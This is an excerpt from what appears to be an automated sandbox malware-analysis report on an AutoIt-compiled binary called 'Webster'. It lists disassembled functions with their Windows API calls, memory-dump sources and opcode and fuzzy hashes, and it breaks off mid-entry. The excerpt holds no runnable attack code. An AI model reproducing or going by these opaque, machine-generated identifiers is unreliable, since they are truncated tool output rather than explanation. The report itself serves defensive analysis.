                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A8E037
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 2783356886-2766056989
                                                                                  • Opcode ID: eb6a8e3768c31641c30ea7ce571ab78f4894104cbd1b53caf71c58b0a5dadb9f
                                                                                  • Instruction ID: fdd1e391a4f6b10a60c178d9c5c99031897ad6ae9fa2e8d1f1b2104fdd4a8397
                                                                                  • Opcode Fuzzy Hash: eb6a8e3768c31641c30ea7ce571ab78f4894104cbd1b53caf71c58b0a5dadb9f
                                                                                  • Instruction Fuzzy Hash: 7A515A71408B459BE320AF50E885BAFBBF8FF88714F41884DF1D8411A1EF709529CB16
                                                                                  Function 00B08096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B08186
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B0819B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: '
                                                                                  • API String ID: 3850602802-1997036262
                                                                                  • Opcode ID: 189d2d7175bcb58c64444168666f8489b1f2ad55e1864e543c5c9d243cfe29a1
                                                                                  • Instruction ID: a5b1612225847bed2b918ac5dda5effb4e03020bd6119669b457f44a7f717b6f
                                                                                  • Opcode Fuzzy Hash: 189d2d7175bcb58c64444168666f8489b1f2ad55e1864e543c5c9d243cfe29a1
                                                                                  • Instruction Fuzzy Hash: 35412874A002099FDB10CF64D881BEA7BF5FF09300F1045AAE944EB391DB70AA56CF90
                                                                                  Function 00AF2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AF2C6A
                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00AF2CA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CrackInternet_memset
                                                                                  • String ID: |
                                                                                  • API String ID: 1413715105-2343686810
                                                                                  • Opcode ID: 53925c479e8b2c26f131d00aa00cf70edb40f710fd2249e0dd9d443981c22f7a
                                                                                  • Instruction ID: 71c5a006529fe08077895a8cd198b06aaad33e389d4a25f87c804cdc5aa28bad
                                                                                  • Opcode Fuzzy Hash: 53925c479e8b2c26f131d00aa00cf70edb40f710fd2249e0dd9d443981c22f7a
                                                                                  • Instruction Fuzzy Hash: E8314D71D00119ABCF11EFA1CD85AEFBFB9FF04340F100019F915AA262EB315956DBA0
                                                                                  Function 00B07088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00B0713C
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B07178
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$DestroyMove
                                                                                  • String ID: static
                                                                                  • API String ID: 2139405536-2160076837
                                                                                  • Opcode ID: 8ea87dfc2a1a9f4b58bbccde2aca5834844f2a1a75430dd60250676f5342fa8b
                                                                                  • Instruction ID: 17558bb82213bda5a51513f6a370020727ada08b977d0606b3c872b85fdcc7d8
                                                                                  • Opcode Fuzzy Hash: 8ea87dfc2a1a9f4b58bbccde2aca5834844f2a1a75430dd60250676f5342fa8b
                                                                                  • Instruction Fuzzy Hash: 52319C71540604AEEB109F78CC80BFBBBE9FF48720F109659F9A5971D0DA30AC81CB60
                                                                                  Function 00AE3049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE30B8
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE30F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: 7ea4219347b9536e8b257acf4d3ce1f9c4401f8ab41bb7f6fb91954df3d47da2
                                                                                  • Instruction ID: 11bb23001ed80b3f4938ed5c33f23e2d5d5af553de19b4b34d75720902ae3903
                                                                                  • Opcode Fuzzy Hash: 7ea4219347b9536e8b257acf4d3ce1f9c4401f8ab41bb7f6fb91954df3d47da2
                                                                                  • Instruction Fuzzy Hash: D831F533600285ABEF248F5AC989BAEBBB8EF05350F14411DE981E71A0EB709B40CB50
                                                                                  Function 00AF40B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __snwprintf.LIBCMT ref: 00AF4132
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __snwprintf_memmove
                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                  • API String ID: 3506404897-2584243854
                                                                                  • Opcode ID: 60621a24542e9ae3f388df056f9a58aa98beb7f2f91232087f2cd8ef3633c850
                                                                                  • Instruction ID: 860326478b90fd616a50dac9f4cc3cfb6b7966b03e2f2af4f1ef25b8e798a5ff
                                                                                  • Opcode Fuzzy Hash: 60621a24542e9ae3f388df056f9a58aa98beb7f2f91232087f2cd8ef3633c850
                                                                                  • Instruction Fuzzy Hash: C0219131A0021DABCF10EFA4C991EAE77F5EF58740F5004A5FA05A7281DB30EA85CBA5
                                                                                  Function 00B06CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B06D86
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B06D91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Combobox
                                                                                  • API String ID: 3850602802-2096851135
                                                                                  • Opcode ID: 8927f6401072dffb45cc0400eaa5593de995f71939414ae4316bb156dcaf06bc
                                                                                  • Instruction ID: 031254e0bd8459e180e26e7547403650a999ff087cd3412b53b1b00583860c48
                                                                                  • Opcode Fuzzy Hash: 8927f6401072dffb45cc0400eaa5593de995f71939414ae4316bb156dcaf06bc
                                                                                  • Instruction Fuzzy Hash: 68116071710209AFEF259E54DC81FBB3FAAEB84364F214279F9149B2E0DA719C618760
                                                                                  Function 00B0722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                    • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                    • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B07296
                                                                                  • GetSysColor.USER32(00000012), ref: 00B072B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                  • String ID: static
                                                                                  • API String ID: 1983116058-2160076837
                                                                                  • Opcode ID: 359501132a7bb230bddbe3a373e0a4476b4f979069827a108f5199961d4a5f1e
                                                                                  • Instruction ID: 4b3e8227cbbabb04b57c66fe2805ddfcc0165aa3126ee9a602b3103b3e6526c3
                                                                                  • Opcode Fuzzy Hash: 359501132a7bb230bddbe3a373e0a4476b4f979069827a108f5199961d4a5f1e
                                                                                  • Instruction Fuzzy Hash: BA211772A5420AAFDB04DFA8CC45EFABBE8EB09314F004658FD55D3290DB75E891DB60
                                                                                  Function 00B06F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00B06FC7
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B06FD6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                  • String ID: edit
                                                                                  • API String ID: 2978978980-2167791130
                                                                                  • Opcode ID: 6543e62a2d6d86c9c274ac980dfa84f9221801c994fa437b5b9d22a91aed1eaa
                                                                                  • Instruction ID: cca151b847fa1fee0fd3307721446fb471f01ae0af75667728e1f8fc280ad259
                                                                                  • Opcode Fuzzy Hash: 6543e62a2d6d86c9c274ac980dfa84f9221801c994fa437b5b9d22a91aed1eaa
                                                                                  • Instruction Fuzzy Hash: 55116D7111020AAFEB105E64AC84EEB3FAAEF15368F504754F965931E0CB75DCA09B60
                                                                                  Function 00AE3156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE31C9
                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AE31E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: a76eeebea13667fd81c2a41ae9c25baf8109ed3d8885e4a42318a3cd768a2577
                                                                                  • Instruction ID: 351bc5df960e386c7efd7c74128a4578d377b29290f82ac029c923c367218bd0
                                                                                  • Opcode Fuzzy Hash: a76eeebea13667fd81c2a41ae9c25baf8109ed3d8885e4a42318a3cd768a2577
                                                                                  • Instruction Fuzzy Hash: 2E110837900254ABDF20DB9ADC4DB9D77B8AF06310F184269E945A7290DB70EF05CB91
                                                                                  Function 00AF28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AF28F8
                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AF2921
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$OpenOption
                                                                                  • String ID: <local>
                                                                                  • API String ID: 942729171-4266983199
                                                                                  • Opcode ID: 72067146ed442360c89c14d5e7f8f79ae5f3e78bfd0f706b1113070d66dc44be
                                                                                  • Instruction ID: e297c43b75c85325e3e71647c8032584767c8086675ce17464f766b4538d8828
                                                                                  • Opcode Fuzzy Hash: 72067146ed442360c89c14d5e7f8f79ae5f3e78bfd0f706b1113070d66dc44be
                                                                                  • Instruction Fuzzy Hash: 5711A370501229BAEB258F918C89FF7FBACFF05791F10812AF64557140E7B05894D7E0
                                                                                  Function 00AF8475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AF86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00AF849D,?,00000000,?,?), ref: 00AF86F7
                                                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AF84A0
                                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00AF84DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 2496851823-2422070025
                                                                                  • Opcode ID: 52c6edf44dbb129f211c6e683e772eb8c0137e67d8b23cc50613af3c831731cf
                                                                                  • Instruction ID: 1d2006e2b28ff8a5f48d0841462359f07532efac5c45fba6559b15d7e0a5324d
                                                                                  • Opcode Fuzzy Hash: 52c6edf44dbb129f211c6e683e772eb8c0137e67d8b23cc50613af3c831731cf
                                                                                  • Instruction Fuzzy Hash: ED11A13520020AABDB10EFA4CD46FFEB364FF14321F10862AFA15972D1DF75A810C695
                                                                                  Function 00AD99BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AD9A2B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 372448540-1403004172
                                                                                  • Opcode ID: 196aff72fee9106aa1fa5eb90e57420cfe28380c130c4f4cec9b6a629a62d403
                                                                                  • Instruction ID: 4957d3fea0f4f3aa5b275365b9c7a07c560ea4b61a783f488110b58db88c5a54
                                                                                  • Opcode Fuzzy Hash: 196aff72fee9106aa1fa5eb90e57420cfe28380c130c4f4cec9b6a629a62d403
                                                                                  • Instruction Fuzzy Hash: 8001B572A52225AF8F14EBA4CD51CFE73B9AF56360B50061AF862573D1DE319C08D660
                                                                                  Function 00AE934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock_memmove
                                                                                  • String ID: EA06
                                                                                  • API String ID: 1988441806-3962188686
                                                                                  • Opcode ID: a4ea8cecd83256c8623b67b32c02df0c29e4871151125457727879bc0c095114
                                                                                  • Instruction ID: 4169272f251dffef175ea2f88b0f66b227a55df957a7aecd364ab66f30bb8695
                                                                                  • Opcode Fuzzy Hash: a4ea8cecd83256c8623b67b32c02df0c29e4871151125457727879bc0c095114
                                                                                  • Instruction Fuzzy Hash: 7C01B972D042587EDB28C7A9C856EBE7BF89B16301F00419EF552D62C1E579A6049760
                                                                                  Function 00AD98B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AD9923
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 372448540-1403004172
                                                                                  • Opcode ID: 24a1654b42b0167b7e9b924835ae8836b747793dcaf43d1b2d459797f82b3ab5
                                                                                  • Instruction ID: 6b19ad6b59de16fc9ed0c7237b01c8095f2a42fda2700a75326c73f23aa4705c
                                                                                  • Opcode Fuzzy Hash: 24a1654b42b0167b7e9b924835ae8836b747793dcaf43d1b2d459797f82b3ab5
                                                                                  • Instruction Fuzzy Hash: 33018476A92105ABCF14EBA0CA62EFF73EC9F15340F60011AB84263391DE119E0896B1
                                                                                  Function 00AD993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AD99A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 372448540-1403004172
                                                                                  • Opcode ID: 61472351fd5291e4467a53e9d2e0d43d60006f30889aa6caf2cb96f96cc683d4
